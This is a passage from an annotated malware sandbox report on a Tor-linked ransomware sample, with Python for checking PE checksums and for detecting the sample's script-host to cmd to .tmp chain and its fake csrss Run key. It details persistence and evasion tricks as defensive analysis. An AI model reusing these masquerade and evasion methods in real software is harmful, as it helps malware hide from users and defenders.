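    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("no PE signature at e_lfanew")
    off = e_lfanew + 4 + 20 + 0x40
    if off % 4 or off + 4 > len(data):
        raise ValueError("CheckSum field misaligned or outside the file")
    return off


def compute_pe_checksum(data: bytes) -> int:
    """CheckSumMappedFile semantics: sum every dword except the CheckSum
    field with end-around carry, fold to 16 bits, add the file length."""
    skip = checksum_field_offset(data)
    total = 0
    for off in range(0, len(data), 4):
        if off == skip:
            continue                                   # the field itself is excluded
        dword = data[off:off + 4].ljust(4, b"\0")      # zero-pad a trailing partial dword
        total += struct.unpack("<I", dword)[0]
        if total >= 1 << 32:                           # end-around carry keeps it 32-bit
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)           # fold to 16 bits ...
    total = (total + (total >> 16)) & 0xFFFF           # ... and absorb the last carry
    return total + len(data)


def stored_pe_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def set_pe_checksum(data: bytes, value: int) -> bytes:
    patched = bytearray(data)
    struct.pack_into("<I", patched, checksum_field_offset(patched), value & 0xFFFFFFFF)
    return bytes(patched)


def verify_pe_checksum(data: bytes) -> tuple:
    """(matches, stored, recomputed). A mismatch means the bytes changed after
    the header was written: packing, patching, or a build that never set it."""
    stored, recomputed = stored_pe_checksum(data), compute_pe_checksum(data)
    return stored == recomputed, stored, recomputed


def build_sample_image(stored_checksum: int = 0) -> bytes:
    """Constructed PE-shaped buffer for the demo: valid header offsets,
    deterministic filler instead of real sections, not loadable."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)            # e_lfanew
    img[0x80:0x84] = PE_SIGNATURE
    struct.pack_into("<H", img, 0x84, 0x014C)          # FileHeader.Machine = i386
    struct.pack_into("<H", img, 0x98, 0x010B)          # OptionalHeader.Magic = PE32
    for i in range(0x100, len(img)):                   # filler standing in for code/data
        img[i] = (i * 7 + 3) & 0xFF
    return set_pe_checksum(img, stored_checksum)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            ok, stored, recomputed = verify_pe_checksum(fh.read())
        print(f"{path}: stored 0x{stored:x}, recomputed 0x{recomputed:x}, "
              f"{'OK' if ok else 'MISMATCH'}")
```

Run it as `python pe_checksum.py radE040D.tmp csrss.exe messg[1].jpg` against the dropped files to get the same pair for each; identical stored and recomputed values across differently named files is a quick way to confirm they are byte-for-byte the same payload without hashing them first.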
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0055020D push ecx; ret 4_2_00550220
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004006DF push ds; iretd 4_2_004006E3
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0044CC0D push ss; iretd 4_2_0044CC11
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0056F5DC push eax; ret 4_2_0056F5FA
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004016F7 push edi; retn 0014h4_2_004016FC
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_2_026740E0 push edx; ret 5_2_026741F1
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_2_02674080 push edx; ret 5_2_0267408B
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004159E0 push edx; ret 5_1_00415DBE
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0040144C push cs; iretd 5_1_0040144D
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041480D pushfd ; retf 0057h5_1_0041480E
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041881C push ebx; retf 5_1_0041884C
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041D0DD push ds; ret 5_1_0041D0E0
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004188F9 push ss; retf 5_1_00418902
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041B080 push edx; ret 5_1_0041B083
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004148B5 push D40057C8h; retf 0057h5_1_004148BA
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041C177 push esp; iretd 5_1_0041C178
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00418903 push cs; iretd 5_1_00418A33
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041A51D push 7FD9F329h; retf 5_1_0041A522
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004185C9 pushfd ; retf 5_1_004185D8
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004189D0 push cs; iretd 5_1_00418A33
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004149E0 push edx; ret 5_1_00414A07
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0055020D push ecx; ret 5_1_00550220
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00418A19 push cs; iretd 5_1_00418A33
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041A6ED push edx; retf 5_1_0041A6F0
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00419E95 push ebp; iretd 5_1_00419E96
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041469D push eax; retf 0057h5_1_0041469E
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004146BD pushad ; retf 0057h5_1_004146BE
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00414701 push 6C0057CAh; retf 0057h5_1_00414706
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041C302 push edi; retf 5_1_0041C305
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00418F0B push ss; ret 5_1_00418F0C
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041C7E2 push eax; ret 5_1_0041C87A

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpFile created: C:\ProgramData\Windows\csrss.exe
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpg
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpFile created: C:\ProgramData\Windows\csrss.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpg (the INetCache\IE path shows the file came through the WinINet cache; it is a PE served under the name messg.jpg)

Boot Survival:

Creates an autostart registry key
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem (the same write is reported twice)
Note: the value name is the description Windows shows for the genuine csrss.exe, a System32 process that is never started from a Run key. The report does not print the value data, but the only csrss.exe this sample writes is C:\ProgramData\Windows\csrss.exe, the file it then executes twice.
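The process chain under Spawns processes and the Run value above are the two things a responder would alert on. As an added example that is not part of the Joe Sandbox report or of the sample, here is a small detection pass in Python over constructed Sysmon-style events (process creation and registry value set) built from the report's paths. The event field layout, the user SID and the Run value data, which the report does not print, are assumptions; the benign control events are constructed too.

```python
"""Flag script host -> cmd.exe /c -> .tmp executable -> csrss.exe outside
System32, plus a Run value that borrows a Windows component name.
Added example over constructed Sysmon-style events; not report or sample code."""
import ntpath

SYSTEM_PROCESS_NAMES = {"csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe",
                        "services.exe", "lsass.exe", "svchost.exe", "conhost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Descriptions Windows shows for its core processes; a Run value using one of
# them is borrowing their credibility.
SYSTEM_COMPONENT_DESCRIPTIONS = {"client server runtime subsystem",    # csrss.exe
                                 "local security authority process",   # lsass.exe
                                 "host process for windows services",  # svchost.exe
                                 "windows logon application",          # winlogon.exe
                                 "windows session manager"}            # smss.exe
RUN_KEYS = ("\\software\\microsoft\\windows\\currentversion\\run",
            "\\software\\microsoft\\windows\\currentversion\\runonce")


def _norm(path: str) -> str:
    return path.strip("'\" ").lower()


def image_from_command(cmd: str) -> str:
    """First token of a command line, quoted or not, lower-cased."""
    cmd = cmd.strip().lower()
    if cmd[:1] in ("'", '"'):
        end = cmd.find(cmd[0], 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def masquerades_system_binary(image: str) -> bool:
    """A core-process file name whose image is not under System32/SysWOW64."""
    p = _norm(image)
    return ntpath.basename(p) in SYSTEM_PROCESS_NAMES and not p.startswith(SYSTEM_DIRS)


def check_process_event(ev: dict) -> list:
    parent = ntpath.basename(_norm(ev["parent_image"]))
    image = _norm(ev["image"])
    name = ntpath.basename(image)
    cmd = _norm(ev["command_line"])
    findings = []
    if parent in SCRIPT_HOSTS and name == "cmd.exe":
        findings.append("script host spawned cmd.exe")
    if name == "cmd.exe" and " /c " in cmd and ".tmp" in cmd:
        findings.append("cmd.exe /c runs a .tmp file")
    if image.endswith(".tmp"):
        findings.append("program launched from a .tmp file")
    if masquerades_system_binary(image):
        findings.append("system process name running outside System32/SysWOW64")
    return findings


def check_run_key_event(ev: dict) -> list:
    key, _, value_name = _norm(ev["target_object"]).rpartition("\\")
    if not key.endswith(RUN_KEYS):
        return []                                  # not an autostart key
    findings = []
    if value_name in SYSTEM_COMPONENT_DESCRIPTIONS:
        findings.append("Run value named after a Windows system component")
    if masquerades_system_binary(image_from_command(ev["details"])):
        findings.append("Run target uses a system process name outside System32/SysWOW64")
    return findings


# Constructed events modelled on the report's lines; the field layout, the SID
# and the Run value data (which the report does not print) are assumptions.
SAMPLE_EVENTS = [
    {"event_id": 1, "parent_image": r"C:\Windows\SysWOW64\wscript.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r"'C:\Windows\System32\cmd.exe' /c C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp"},
    {"event_id": 1, "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\radE040D.tmp",
     "command_line": r"C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp"},
    {"event_id": 1, "parent_image": "unknown",         # parent not recorded by the report
     "image": r"C:\ProgramData\Windows\csrss.exe",
     "command_line": r"'C:\ProgramData\Windows\csrss.exe'"},
    {"event_id": 1, "parent_image": r"C:\Windows\System32\services.exe",   # benign control
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"event_id": 13, "details": r"C:\ProgramData\Windows\csrss.exe",       # value data assumed
     "target_object": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem"},
    {"event_id": 13, "details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
     "target_object": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"},  # benign control
]


def run_detection(events: list) -> list:
    """One findings list per event, in input order."""
    return [check_process_event(ev) if ev["event_id"] == 1
            else check_run_key_event(ev) if ev["event_id"] == 13 else []
            for ev in events]


if __name__ == "__main__":
    for ev, findings in zip(SAMPLE_EVENTS, run_detection(SAMPLE_EVENTS)):
        print(ev.get("image") or ev.get("target_object"), "->", findings or "clean")
```

A path under AppData or ProgramData on its own is deliberately not a finding (the OneDrive control shows why); the signal is a core-process name or description combined with a location outside System32/SysWOW64, and the script-host -> cmd.exe /c -> .tmp chain.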

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\437#u0430.js (#U0430 is the report's escape for U+0430, Cyrillic small letter a, so the sample was submitted as 437а.js)
May use the Tor software to hide its network traffic
Source: csrss.exeBinary or memory string: onion-port
Note: onion-port is one of many Tor strings in csrss.exe. The ones listed earlier in this report (src/or/*.h and src/common/*.h file names with digests, the X-Your-Address-Is: directory-server header, the introduction-point/ip-address/onion-port/service-key descriptor fields, accounting/interval-start, %d.%d.%d.%d.in-addr.arpa) are Tor's own source and protocol strings, which points to a Tor client compiled into the binary rather than a separately fetched tor.exe.
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP 4_2_0041A13C
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX (3 calls)
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX (3 calls)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOX (7 calls)
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOX (8 calls)
Note: wscript.exe and cmd.exe are the Microsoft binaries themselves and no injection into them was observed (see the Overview), so only the radE040D.tmp and csrss.exe entries are attributable to the sample.

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004195BA rdtsc 5_1_004195BA
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 4_2_00449089
Note: this API sequence (GetVersionExA, NetStatisticsGet, a Toolhelp32 snapshot walked with Heap32*/Process32*/Thread32*/Module32* between GetTickCount calls, then GlobalMemoryStatus and GetCurrentProcessId) is OpenSSL's Windows entropy collector RAND_poll() from rand_win.c, which Tor links. It gathers seed material for the RNG; it does not check the parent process.
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer (the window wscript.exe creates to service WScript.Sleep, i.e. the JScript stage paused before handing over to the dropped PE)
Found evaded block containing many API calls
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpEvaded block: after key decision (graph_4-50446)
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_4-49130)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp TID: 3540Thread sleep count: 138 > 30
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp TID: 4624Thread sleep count: 152 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpLast function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 4_2_00416D6D
Contains functionality to query local drives
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW, 4_2_00416AEC
Contains functionality to query system information
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0040AA8F __EH_prolog,GetSystemInfo, 4_2_0040AA8F
Note: the drive and directory enumeration is filed under evasion, but for a sample classified rans it is the targeting logic an encryptor needs: list the drives, check their type, and walk the files (the GetSystemDirectoryW call next to GetDriveTypeW suggests the Windows directory is excluded). Read it as pre-encryption reconnaissance rather than sandbox detection.
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Note: every string below is the name of a Hyper-V component package, WinSxS manifest or servicing catalog that ships with Windows 10 1803 (build 10.0.17134, the analysis VM's own build), found in the process memory dumps (.sdmp) of radE040D.tmp and csrss.exe. Given the FindFirstFileW/FindNextFileW and GetLogicalDriveStringsW code listed above, they are most plausibly residue of walking C:\Windows\servicing\Packages and C:\Windows\WinSxS and would be present on physical hardware as well; treat this signature as low-confidence here. The one exception is a base64 string (an RSA public-key fragment) that the matcher swept in along with the rest.
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat1
Source: radE040D.tmp, 00000004.00000003.7168740992.0000000003103000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat8\e
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b.manifestmV
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_microsoft-onecore-uiamanager_31bf3856ad364e35_10.0.17134.1_none_b5bc4f47f4347c9a\amd64_microsoft-onecore-encdump_31bf3856ad364e35_10.0.17134.1_none_c9af4ac1de264540\amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565\amd64_microsoft-system-user-ext_31bf3856ad364e35_10.0.17134.1_none_60e18319883c0acb\aamd64_microsoft-windows-acledit_31bf3856ad364e35_10.0.17134.1_none_4d620c9fc5bc5c30\c9amd64_microsoft-windows-bcrypt-dll_31bf3856ad364e35_10.0.17134.1_none_d40d1fc458900e79\amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45\amd64_microsoft-onecore-cdp-winrt_31bf3856ad364e35_10.0.17134.1_none_492d582f5cbd45f0\amd64_microsoft-onecore-quiethours_31bf3856ad364e35_10.0.17134.1_none_8e6c6b9a9f19e7c7\amd64_microsoft-windows-aadjcsp_31bf3856ad364e35_10.0.17134.1_none_600d1259ff3335b6\b9amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0\0e5bamd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.17134.1_none_2becad3b77bb3580
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..ercommon-deployment_31bf3856ad364e35_10.0.17134.1_none_ffda9e2d3858e036.manifest
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumat
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1t34.1O\
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-onecore-coremessaging_31bf3856ad364e35_10.0.17134.1_none_2d035fdf4cb254bf\7eamd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.48_none_28a3bf323de300ba\amd64_microsoft-windows-ad-propertypages_31bf3856ad364e35_10.0.17134.1_none_d37a0ec2b596cdaf\eamd64_microsoft-onecore-assignedaccess-csp_31bf3856ad364e35_10.0.17134.1_none_37310745ce695f93\amd64_microsoft-onecore-bluetooth-service_31bf3856ad364e35_10.0.17134.1_none_d1cde1fc2644ba6c\amd64_microsoft-onecore-bluetooth-userapis_31bf3856ad364e35_10.0.17134.1_none_5135b094293fbb0b\amd64_microsoft-onecore-coremessaging_31bf3856ad364e35_10.0.17134.165_none_2917828339aae782\amd64_microsoft-onecore-console-host-core_31bf3856ad364e35_10.0.17134.1_none_5316cfc78d5f777e\amd64_microsoft-onecore-dolbyhrtfenc_31bf3856ad364e35_10.0.17134.1_none_fc1917e579d73fea\7amd64_microsoft-onecore-bluetooth-proxy_31bf3856ad364e35_10.0.17134.1_none_d1d1581b008d2447\amd64
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumum
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catT
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.1d\
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat\
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8.manifest
Source: radE040D.tmp, 00000004.00000003.7131093033.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Packa
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumcat
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumt
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.1t
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.17134.1_none_18c6a9392dd7eb3e.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239.manifestO
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_bae31ba10711fa29.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.17134.1_none_2becad3b77bb3580.manifestest#
Source: radE040D.tmp, 00000004.00000002.8062573216.0000000003FBE000.00000004.sdmpBinary or memory string: RnGteKdWF/DzReAcBhgFS14E9Bt2wEanR++IZpEw+J9HVAFMRnNpAgMBAAE= (not a VM artifact: this is base64 whose tail AgMBAAE= decodes to the DER bytes 02 03 01 00 01, an INTEGER 65537, the usual RSA public exponent, so the string is the end of a base64/PEM-encoded RSA public key in the sample's memory, which fits the rans classification)
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-storflt_31bf3856ad364e35_10.0.17134.1_none_fc7308d7bbb0dfd6.manifesteav
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catcat
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1.manifest
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.18\e
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80\7]
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8.manifest
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumtt
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumL
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7130318718.000000000311F000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1ati
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat34.1
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.17134.1_none_611f8a7fa810774a.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.17134.1_none_e99c08352e0bfafa\n
